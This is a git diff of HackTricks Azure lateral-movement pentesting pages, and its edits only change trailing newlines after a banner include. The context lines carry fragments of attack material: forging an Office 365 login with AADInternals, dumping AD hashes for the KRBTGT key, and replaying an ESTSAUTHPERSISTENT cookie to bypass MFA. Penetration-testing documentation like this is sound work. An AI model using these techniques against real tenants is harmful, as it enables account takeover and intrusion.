-69,4 +69,3 @@ At this point, we can gather the remaining information needed to connect to Azur - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/) {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.md index 93b507c90..4cfa77759 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.md @@ -84,4 +84,3 @@ This dumps all AD user password hashes, giving the attacker the KRBTGT hash (let {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md index 05903f7b6..ca045d745 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md @@ -162,4 +162,4 @@ az rest \ -{{#include ../../../banners/hacktricks-training.md}} +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md index 8844cec41..d642532c7 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md @@ -215,4 +215,3 @@ az-seamless-sso.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md index ee27ddc18..d5cb39c57 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md @@ -87,4 +87,4 @@ while IFS=$'\t' read -r vm_name resource_group; do done <<< "$vm_list" ``` -{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md index ce309f4bd..39991fa23 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md @@ -160,4 +160,3 @@ Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http: {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md index be753fc7a..d4f7b0fca 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md @@ -28,4 +28,3 @@ In order to synchronize a new user from Entra ID to the on-prem AD these are the {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md index 03bb8817a..1606bd6cd 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md @@ -60,4 +60,3 @@ curl -o -L -H "Authorization: Bearer " '<@microsoft.gra {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md index 831379dce..cfd5382d7 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md @@ -38,4 +38,3 @@ Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md index ff358fba8..96e22d70f 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md @@ -35,4 +35,3 @@ Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSIST - [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md index ae2e8b2d8..d43f6b4a8 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md @@ -364,4 +364,3 @@ curl -s -X POST \ {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md index 0d73a46f1..956f610cf 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md @@ -104,4 +104,3 @@ az-seamless-sso.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md index 0c58d0c89..80c8a88f4 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md @@ -205,4 +205,3 @@ If the Active Directory administrators have access to Azure AD Connect, they can - [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) {{#include ../../../banners/hacktricks-training.md}} -